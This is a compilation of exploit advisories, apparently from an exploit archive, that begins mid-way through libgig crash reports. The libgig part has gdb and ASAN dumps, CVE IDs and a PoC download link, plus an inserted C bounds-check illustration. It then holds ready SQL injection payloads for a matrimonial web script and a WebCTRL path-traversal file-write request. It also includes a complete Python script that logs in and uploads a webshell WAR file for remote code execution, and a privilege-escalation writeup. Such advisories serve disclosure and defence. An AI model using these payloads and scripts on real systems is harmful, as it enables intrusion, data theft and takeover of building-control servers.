4445 RegionKeyTable[iKey] = pRegion;
(gdb) bt
#0 gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0)
at gig.cpp:4445
#1 0x00007ffff7bc0b75 in gig::Instrument::Instrument (this=0x60a1a0,
pFile=<optimized out>, insList=0x60a0c0, pProgress=0x7fffffffdd90)
at gig.cpp:4409
#2 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#3 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
this=this@entry=0x609160) at gig.cpp:5378
#4 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#5 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble
Dump of assembler code for function gig::Instrument::UpdateRegionKeyTable():
   0x00007ffff7bba240 <+0>:     xor    %eax,%eax
   0x00007ffff7bba242 <+2>:     nopw   0x0(%rax,%rax,1)
   0x00007ffff7bba248 <+8>:     movq   $0x0,0x80(%rdi,%rax,1)
   0x00007ffff7bba254 <+20>:    add    $0x8,%rax
   0x00007ffff7bba258 <+24>:    cmp    $0x400,%rax
   0x00007ffff7bba25e <+30>:    jne    0x7ffff7bba248 <gig::Instrument::UpdateRegionKeyTable()+8>
   0x00007ffff7bba260 <+32>:    mov    0x60(%rdi),%r9
   0x00007ffff7bba264 <+36>:    mov    (%r9),%r8
   0x00007ffff7bba267 <+39>:    cmp    %r9,%r8
   0x00007ffff7bba26a <+42>:    je     0x7ffff7bba2a4 <gig::Instrument::UpdateRegionKeyTable()+100>
   0x00007ffff7bba26c <+44>:    nopl   0x0(%rax)
   0x00007ffff7bba270 <+48>:    mov    0x10(%r8),%rcx
   0x00007ffff7bba274 <+52>:    movzwl 0x78(%rcx),%eax
   0x00007ffff7bba278 <+56>:    movzwl 0x7a(%rcx),%esi
   0x00007ffff7bba27c <+60>:    cmp    %esi,%eax
   0x00007ffff7bba27e <+62>:    jg     0x7ffff7bba29a <gig::Instrument::UpdateRegionKeyTable()+90>
   0x00007ffff7bba280 <+64>:    add    $0x1,%esi
   0x00007ffff7bba283 <+67>:    nopl   0x0(%rax,%rax,1)
   0x00007ffff7bba288 <+72>:    movslq %eax,%rdx
   0x00007ffff7bba28b <+75>:    add    $0x1,%eax
   0x00007ffff7bba28e <+78>:    cmp    %esi,%eax
=> 0x00007ffff7bba290 <+80>:    mov    %rcx,0x80(%rdi,%rdx,8)
   0x00007ffff7bba298 <+88>:    jne    0x7ffff7bba288 <gig::Instrument::UpdateRegionKeyTable()+72>
   0x00007ffff7bba29a <+90>:    mov    (%r8),%r8
   0x00007ffff7bba29d <+93>:    cmp    %r8,%r9
   0x00007ffff7bba2a0 <+96>:    jne    0x7ffff7bba270 <gig::Instrument::UpdateRegionKeyTable()+48>
   0x00007ffff7bba2a2 <+98>:    repz retq
   0x00007ffff7bba2a4 <+100>:   repz retq
End of assembler dump.
(gdb) i r
rax            0x3fbd   16317
rbx            0x60a1a0 6332832
rcx            0x60d580 6346112
rdx            0x3fbc   16316
rsi            0x4201   16897
rdi            0x60a1a0 6332832
rbp            0x7fffffffdd90   0x7fffffffdd90
rsp            0x7fffffffdd08   0x7fffffffdd08
r8             0x60e740 6350656
r9             0x60b0f0 6336752
r10            0x7fffffffdad0   140737488345808
r11            0x7ffff7bba240   140737349657152
r12            0x0      0
r13            0x60a0c0 6332608
r14            0x60a980 6334848
r15            0x60d580 6346112
rip            0x7ffff7bba290   0x7ffff7bba290 <gig::Instrument::UpdateRegionKeyTable()+80>
eflags         0x10283  [ CF SF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
ASAN:SIGSEGV
=================================================================
==43045== ERROR: AddressSanitizer: SEGV on unknown address 0x60460003dd80 (pc 0x7fb8f7cfcd88 sp 0x7ffcb179db10 bp 0x60460001f500 T0)
AddressSanitizer can not provide additional info.
#0 0x7fb8f7cfcd87 in gig::Instrument::UpdateRegionKeyTable() /home/a/Documents/libgig-4.0.0/src/gig.cpp:4444
#1 0x7fb8f7d2efe2 in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4409
#2 0x7fb8f7d30fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
#3 0x7fb8f7d026a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#6 0x7fb8f7350ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:4445 gig::Instrument::UpdateRegionKeyTable()
==43045== ABORTING
POC:
libgig_4.0.0_invalid_memory_write.gig
CVE:
CVE-2017-12953
5.
The gig::Region::GetSampleFromWavePool function in gig.cpp in libgig 4.0.0 can cause a denial of service (invalid memory read and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_invalid_memory_read.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520,
WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
3849 unsigned long soughtoffset = file->pWavePoolTable[WavePoolTableIndex];
(gdb) bt
#0 gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520,
WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
#1 0x00007ffff7bc07df in gig::Region::Region (this=0x612520,
pInstrument=<optimized out>, rgnList=0x6100f0) at gig.cpp:2970
#2 0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80,
pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdd90)
at gig.cpp:4404
#3 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#4 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
this=this@entry=0x609160) at gig.cpp:5378
#5 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#6 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble
Dump of assembler code for function gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*):
   0x00007ffff7bbac00 <+0>:     cmp    $0xffffffff,%esi
   0x00007ffff7bbac03 <+3>:     je     0x7ffff7bbac63 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+99>
   0x00007ffff7bbac05 <+5>:     push   %r12
   0x00007ffff7bbac07 <+7>:     push   %rbp
   0x00007ffff7bbac08 <+8>:     push   %rbx
   0x00007ffff7bbac09 <+9>:     mov    0x18(%rdi),%rax
   0x00007ffff7bbac0d <+13>:    mov    0x18(%rax),%rbx
   0x00007ffff7bbac11 <+17>:    mov    0x78(%rbx),%rax
   0x00007ffff7bbac15 <+21>:    test   %rax,%rax
   0x00007ffff7bbac18 <+24>:    je     0x7ffff7bbac5c <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+92>
   0x00007ffff7bbac1a <+26>:    mov    %esi,%ecx
   0x00007ffff7bbac1c <+28>:    mov    %rbx,%rdi
   0x00007ffff7bbac1f <+31>:    mov    %rdx,%rsi
=> 0x00007ffff7bbac22 <+34>:    mov    (%rax,%rcx,4),%ebp
   0x00007ffff7bbac25 <+37>:    mov    0x80(%rbx),%rax
   0x00007ffff7bbac2c <+44>:    mov    (%rax,%rcx,4),%r12d
   0x00007ffff7bbac30 <+48>:    callq  0x7ffff7b9e400 <_ZN3gig4File14GetFirstSampleEPN4RIFF10progress_tE@plt>
   0x00007ffff7bbac35 <+53>:    test   %rax,%rax
(gdb) i r
rax            0x609f80 6332288
rbx            0x609160 6328672
rcx            0xff000000       4278190080
rdx            0x0      0
rsi            0x0      0
rdi            0x609160 6328672
rbp            0x0      0x0
rsp            0x7fffffffdc90   0x7fffffffdc90
r8             0x0      0
r9             0x2      2
r10            0x0      0
r11            0x246    582
r12            0x613190 6369680
r13            0x612520 6366496
r14            0x0      0
r15            0x0      0
rip            0x7ffff7bbac22   0x7ffff7bbac22 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+34>
eflags         0x10202  [ IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
ASAN:SIGSEGV
=================================================================
==44028== ERROR: AddressSanitizer: SEGV on unknown address 0x6009fc00ed70 (pc 0x7fea916446ac sp 0x7ffd026ec040 bp 0x0c08c0003ea3 T0)
AddressSanitizer can not provide additional info.
#0 0x7fea916446ab in gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3850
#1 0x7fea91670247 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
#2 0x7fea91671f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
#3 0x7fea91673fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
#4 0x7fea916456a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#5 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#6 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#7 0x7fea90c93ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:3849 gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)
==44028== ABORTING
POC:
libgig_4.0.0_invalid_memory_read.gig
CVE:
CVE-2017-12954
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42546.zip
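The dumps above all share one root cause: a value read straight from the .gig file (a key range, a wave-pool index, a chunk data pointer) is used as an index or dereferenced without a bound or NULL check. The following is an added C illustration of the three checks behind items 3, 4 and 5; it is not libgig source and not a patch for it, but a toy model whose struct layouts, field names and function names are assumptions. The crafted values are taken from the register dumps: key_high 0x4200 from the rsi/rax pair in item 4 (the loop has already written 16k slots past a 128-entry table) and wave-pool index 0xff000000 from rcx in item 5. Items 1 and 2 sit on the same parsing path and call for the same discipline.

```c
/* Added illustration, not libgig source: the input checks the crashes above lack,
 * against a toy model of the structures. Layouts and names are assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define KEY_TABLE_SIZE 128   /* one slot per MIDI key; the zeroing loop covers 0x400 bytes = 128 * 8 */

typedef struct { uint16_t key_low, key_high; } region_t;                         /* key range from the file */
typedef struct { const region_t *key_table[KEY_TABLE_SIZE]; } instrument_t;
typedef struct { const uint32_t *wave_pool_table; uint32_t wave_pool_count; } file_t;

/* Decode a region's key range from a little-endian chunk body (assumed layout:
 * two u16 at offset 0). Returns -1 for a missing or short chunk. */
int region_from_chunk(const uint8_t *data, size_t size, region_t *out)
{
    if (data == NULL || size < 4)
        return -1;
    out->key_low  = (uint16_t)(data[0] | (data[1] << 8));
    out->key_high = (uint16_t)(data[2] | (data[3] << 8));
    return 0;
}

/* CVE-2017-12953: the crashing loop is effectively
 *     for (k = low; k <= high; k++) table[k] = region;
 * with high read from the file (0x4200 in the dump above) and never compared
 * against the table size, so the stores run thousands of slots past the object.
 * Returns 0, or -1 if any region's range does not fit, before touching the table. */
int update_region_key_table(instrument_t *ins, const region_t *regions, size_t n)
{
    memset(ins->key_table, 0, sizeof ins->key_table);
    for (size_t i = 0; i < n; i++) {
        const region_t *r = &regions[i];
        if (r->key_low > r->key_high || r->key_high >= KEY_TABLE_SIZE)
            return -1;
        for (unsigned k = r->key_low; k <= r->key_high; k++)
            ins->key_table[k] = r;
    }
    return 0;
}

/* CVE-2017-12954: the wave pool index is a 32-bit value from the file
 * (0xff000000 in the dump) used to index pWavePoolTable without a bound. */
int wave_pool_offset(const file_t *f, uint32_t index, uint32_t *offset)
{
    if (f->wave_pool_table == NULL || index >= f->wave_pool_count)
        return -1;
    *offset = f->wave_pool_table[index];
    return 0;
}

/* CVE-2017-12952: helper.h's LoadString scans str[len] for a NUL, but the chunk
 * data pointer can be NULL (rax == 0 at the fault) and the chunk body need not be
 * terminated. Bound the scan by the chunk size and the output buffer. */
int load_string(const char *data, uint32_t size, char *out, size_t out_size)
{
    if (out_size == 0)
        return -1;
    out[0] = '\0';
    if (data == NULL)
        return -1;
    size_t len = 0;
    while (len < size && data[len] != '\0')
        len++;
    if (len >= out_size)
        len = out_size - 1;          /* truncate instead of overrunning out */
    memcpy(out, data, len);
    out[len] = '\0';
    return 0;
}

/* Exercise the checks with values from the crash dumps above.
 * Returns the number of failed expectations (0 when everything behaves). */
int run_demo(void)
{
    int failures = 0;
    instrument_t ins;
    region_t good, crafted;
    const uint8_t ok_chunk[4]  = { 60, 0, 72, 0 };        /* constructed: keys 60..72 */
    const uint8_t bad_chunk[4] = { 0, 0, 0x00, 0x42 };    /* constructed: high = 0x4200 */

    failures += region_from_chunk(ok_chunk, sizeof ok_chunk, &good) != 0;
    failures += region_from_chunk(bad_chunk, sizeof bad_chunk, &crafted) != 0;
    failures += update_region_key_table(&ins, &good, 1) != 0;
    failures += ins.key_table[60] != &good || ins.key_table[59] != NULL;
    failures += update_region_key_table(&ins, &crafted, 1) != -1;   /* rejected */

    const uint32_t pool[2] = { 0x100, 0x200 };
    const file_t f = { pool, 2 };
    uint32_t off = 0;
    failures += wave_pool_offset(&f, 1, &off) != 0 || off != 0x200;
    failures += wave_pool_offset(&f, 0xff000000u, &off) != -1;       /* rejected */

    char name[8];
    const char unterminated[4] = { 'I', 'N', 'F', 'O' };             /* constructed, no NUL */
    failures += load_string(unterminated, 4, name, sizeof name) != 0 || strcmp(name, "INFO") != 0;
    failures += load_string(NULL, 4, name, sizeof name) != -1 || name[0] != '\0';
    return failures;
}
```

The point of rejecting before the loop rather than clamping inside it is that a region whose range fails the check is evidence of a malformed or hostile file; refusing to load it is safer than silently mapping part of the range. The same reasoning applies to the wave-pool index: a miss against the pool count means the sample cannot be resolved at all, so there is nothing sensible to return.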
# # # # #
# Exploit Title: Matrimonial Script - SQL Injection
# Dork: N/A
# Date: 22.08.2017
# Vendor Homepage: http://www.scubez.net/
# Software Link: http://www.mscript.in/
# Demo: http://www.mscript.in/matrimonial-demo.html
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands through the request parameters listed below.
#
# Proof of Concept:
#
# http://localhost/[PATH]/viewprofile.php?id=[SQL]
#
# -MUS00053'+/*!11100uNiOn*/(/*!11100sElEct*/0x283129,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729,0x28343829,0x28343929,0x28353029,0x28353129,0x28353229,0x28353329,0x28353429,0x28353529,0x28353629,0x28353729,0x28353829,0x28353929,0x28363029,0x28363129,0x28363229,0x28363329,0x28363429,0x28363529,0x28363629,0x28363729,0x28363829,0x28363929,0x28373029,0x28373129,0x28373229,0x28373329,0x28373429,0x28373529,0x28373629,0x28373729,0x28373829,0x28373929,0x28383029,0x28383129,0x28383229,0x28383329,0x28383429,0x28383529,0x28383629,0x28383729,0x28383829,0x28383929,0x28393029,0x28393129,0x28393229,0x28393329,0x28393429,0x28393529,0x28393629,0x28393729,0x28393829,0x28393929,0x2831303029,0x2831303129,0x2831303229,0x2831303329,0x2831303429,0x2831303529,0x2831303629,0x2831303729,0x2831303829,0x2831303929,0x2831313029,0x2831313129,0x2831313229,0x2831313329,0x2831313429,0x2831313529,0x2831313629,0x2831313729,0x2831313829,0x2831313929,0x2831323029,0x2831323129,0x2831323229,0x2831323329,0x2831323429,0x2831323529,0x2831323629,0x2831323729,0x2831323829,0x2831323929,0x2831333029,0x2831333129,0x2831333229,0x2831333329,0x2831333429,0x2831333529,0x2831333629,0x2831333729,0x2831333829,0x2831333929,0x2831343029,0x2831343129,0x2831343229,0x2831343329,0x2831343429,0x2831343529,0x2831343629,0x2831343729,0x2831343829,0x2831343929,0x2831353029,0x2831353129,0x2831353229,0x2831353329,0x2831353429,0x2831353529,0x2831353629,0x2831353729,0x2831353829,0x2831353929,0x2831363029,0x2831363129,0x2831363229,0x2831363329,0x2831363429,0x2831363529,0x2831363629,0x2831363729,0x2831363829,0x2831363929,0x2831373029,0x2831373129,0x2831373229,0x2831373329,0x2831373429,0x2831373529,0x2831373629,0x2831373729,0x2831373829,0x2831373929,0x2831383029,0x2831383129,/*!50000dataBase*/(),0x2831383329)--+-
#
# http://localhost/[PATH]/load_caste_state_city.php?list_type=caste&&parent_id=[SQL]
#
# -1+/*!22255union*/+/*!22255+sElEct*/+0x31,(/*!22255+sElEct*/+eXpoRt_Set(5,@:=0,(/*!22255+sElEct*/+count(*)fROm(iNformatiOn_sChemA.colUmns)/*!22255where*/@:=eXpoRt_Set(5,eXpoRt_Set(5,@,table_name,0x3c6c693e,2),cOlumN_naMe,0xa3a,2)),@,2)),0x33--+-
#
# http://localhost/[PATH]/printprofile.php?id=[SQL]
# http://localhost/[PATH]/viewphoto.php?id=[SQL]
# http://localhost/[PATH]/advsearch_results.php?gender=[SQL]
# http://localhost/[PATH]/advsearch_results.php?age1=[SQL]
# http://localhost/[PATH]/advsearch_results.php?age2=[SQL]
# http://localhost/[PATH]/advsearch_results.php?religion=[SQL]
# http://localhost/[PATH]/advsearch_results.php?caste=[SQL]
# http://localhost/[PATH]/advsearch_results.php?ms=[SQL]
# http://localhost/[PATH]/advsearch_results.php?language=[SQL]
# http://localhost/[PATH]/advsearch_results.php?edu=[SQL]
# http://localhost/[PATH]/advsearch_results.php?occu=[SQL]
# http://localhost/[PATH]/advsearch_results.php?country=[SQL]
#
# Etc..
# # # # #
Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write
Vendor: Automated Logic Corporation
Product web page: http://www.automatedlogic.com
Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior
ALC WebCTRL, i-Vu 6.0 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
Summary: WebCTRL®, Automated Logic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators to optimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need to keep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.
Desc: The vulnerability is triggered by an authenticated user who can use
the manualcommand console in the management panel of the affected application.
The ManualCommand() function in ManualCommand.js allows users to perform additional
diagnostics and settings overview by using a pre-defined set of commands. This
can be exploited by using the echo command, combined with directory traversal in
the redirect target, to write and/or overwrite arbitrary files anywhere on the system.
Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
Apache-Coyote/1.1
Apache Tomcat/7.0.42
CJServer/1.1
Java/1.7.0_25-b17
Java HotSpot Server VM 23.25-b01
Ant 1.7.0
Axis 1.4
Trove 2.0.2
Xalan Java 2.4.1
Xerces-J 2.6.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5430
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5430.php
CVE ID: CVE-2017-9640
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9640
30.01.2017
--
PoC:
GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1
Host: TARGET
---
GET http://TARGET/touch.txt HTTP/1.1
peend
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
#
# Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution
#
#
# Vendor: Automated Logic Corporation
# Product web page: http://www.automatedlogic.com
# Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
# ALC WebCTRL, SiteScan Web 6.1 and prior
# ALC WebCTRL, i-Vu 6.0 and prior
# ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
# ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
#
# Summary: WebCTRL®, Automated Logic's web-based building automation
# system, is known for its intuitive user interface and powerful integration
# capabilities. It allows building operators to optimize and manage
# all of their building systems - including HVAC, lighting, fire, elevators,
# and security - all within a single HVAC controls platform. It's everything
# they need to keep occupants comfortable, manage energy conservation measures,
# identify key operational problems, and validate the results.
#
# Desc: WebCTRL suffers from an authenticated arbitrary code execution
# vulnerability. The issue is caused due to the improper verification
# when uploading Add-on (.addons or .war) files using the uploadwarfile
# servlet. This can be exploited to execute arbitrary code by uploading
# a malicious web archive file that will run automatically and can be
# accessed from within the webroot directory. Additionally, an improper
# authorization access control occurs when using the 'anonymous' user.
# By specification, the anonymous user should not have permissions or
# authorization to upload or install add-ons. In this case, when using
# the anonymous user, an attacker is still able to upload a malicious
# file via insecure direct object reference and execute arbitrary code.
# The anonymous user was removed from version 6.5 of WebCTRL.
#
# Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
# Apache-Coyote/1.1
# Apache Tomcat/7.0.42
# CJServer/1.1
# Java/1.7.0_25-b17
# Java HotSpot Server VM 23.25-b01
# Ant 1.7.0
# Axis 1.4
# Trove 2.0.2
# Xalan Java 2.4.1
# Xerces-J 2.6.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5431
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5431.php
#
# ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01
# CVE ID: CVE-2017-9650
# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9650
#
#
# 30.01.2017
#
#
import itertools
import mimetools
import mimetypes
import cookielib
import binascii
import urllib2
import urllib
import sys
import re
import os
from urllib2 import URLError
global bindata
__author__ = 'lqwrm'
piton = os.path.basename(sys.argv[0])
def bannerche():
print '''
@-------------------------------------------------@
| |
| WebCTRL 6.5 Authenticated RCE PoC |
| ID: ZSL-2017-5431 |
| Copyleft (c) 2017, Zero Science Lab |
| |
@-------------------------------------------------@
'''
if len(sys.argv) < 3:
print '[+] Usage: '+piton+' <IP> <WAR FILE>'
print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n'
sys.exit()
bannerche()
host = sys.argv[1]
filename = sys.argv[2]
with open(filename, 'rb') as f:
content = f.read()
hexo = binascii.hexlify(content)
bindata = binascii.unhexlify(hexo)
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
print '[+] Probing target http://'+host
try:
    checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en')
except urllib2.HTTPError, errorzio:
    if errorzio.code == 404:
        print '[!] Error 001:'
        print '[-] Check your target!'
        print
        sys.exit()
except URLError, errorziocvaj:
    if errorziocvaj.reason:
        print '[!] Error 002:'
        print '[-] Check your target!'
        print
        sys.exit()
print '[+] Target seems OK.'
print '[+] Login please:'
print '''
Default username: Administrator, Anonymous
Default password: (blank), (blank)
'''
username = raw_input('[*] Enter username: ')
password = raw_input('[*] Enter password: ')
login_data = urllib.urlencode({'pass':password, 'name':username, 'touchscr':'false'})
opener.addheaders = [('User-agent', 'Thrizilla/33.9')]
login = opener.open('http://'+host+'/?language=en', login_data)
auth = login.read()
if re.search(r'productName = \'WebCTRL', auth):
    print '[+] Authenticated!'
    token = re.search('wbs=(.+?)&', auth).group(1)
    print '[+] Got wbs token: '+token
    cookie1, cookie2 = [str(c) for c in cj]
    cookie = cookie1[8:51]
    print '[+] Got cookie: '+cookie
else:
    print '[-] Incorrect username or password.'
    print
    sys.exit()
print '[+] Sending payload.'
class MultiPartForm(object):
    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
        return
    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary
    def add_field(self, name, value):
        self.form_fields.append((name, value))
        return
    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((fieldname, filename, mimetype, body))
        return
    def __str__(self):
        parts = []
        part_boundary = '--' + self.boundary
        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"' % name,
              '',
              value,
            ]
            for name, value in self.form_fields
            )
        parts.extend(
            [ part_boundary,
              'Content-Disposition: file; name="%s"; filename="%s"' % \
                 (field_name, filename),
              'Content-Type: %s' % content_type,
              '',
              body,
            ]
            for field_name, filename, content_type, body in self.files
            )
        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        flattened.append('')
        return '\r\n'.join(flattened)
if __name__ == '__main__':
    form = MultiPartForm()
    form.add_field('wbs', token)
    form.add_field('file"; filename="'+filename, bindata)
    request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile')
    request.add_header('User-agent', 'SCADA/8.0')
    body = str(form)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Cookie', cookie)
    request.add_header('Content-length', len(body))
    request.add_data(body)
    request.get_data()
    urllib2.urlopen(request).read()
    print '[+] Payload uploaded.'
    print '[+] Shell available at: http://'+host+'/'+filename[:-4]
    print
    sys.exit()
Automated Logic WebCTRL 6.5 Insecure File Permissions Privilege Escalation
Vendor: Automated Logic Corporation
Product web page: http://www.automatedlogic.com
Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
ALC WebCTRL, SiteScan Web 6.1 and prior
ALC WebCTRL, i-Vu 6.0 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
Summary: WebCTRL®, Automated Logic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators to optimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need to keep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.
Desc: WebCTRL server/service suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user who can replace the executable
file with a binary of choice. The vulnerability exists due to improper permissions:
the 'M' flag (Modify) or 'C' flag (Change) is granted to the 'Authenticated Users' group.
The application also suffers from an unquoted search path issue impacting the service
'WebCTRL Service' for Windows deployed as part of the WebCTRL server solution. This could
potentially allow an authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. A successful attempt would require the
local user to be able to insert their code in the system root path undetected by the
OS or other security applications, where it could potentially be executed during
application startup or reboot. If successful, the local user's code would execute
with the elevated privileges of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5429
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5429.php
CVE ID: CVE-2017-9644
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9644
30.01.2017
---
sc qc "WebCTRL Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Webctrl Service
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WebCTRL6.0\WebCTRL Service.exe -run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WebCTRL Service 6.0
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
cacls "C:\WebCTRL6.0\WebCTRL Service.exe"
C:\WebCTRL6.0\WebCTRL Service.exe
BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
cacls "C:\WebCTRL6.0\WebCTRL Server.exe"
C:\WebCTRL6.0\WebCTRL Server.exe
BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
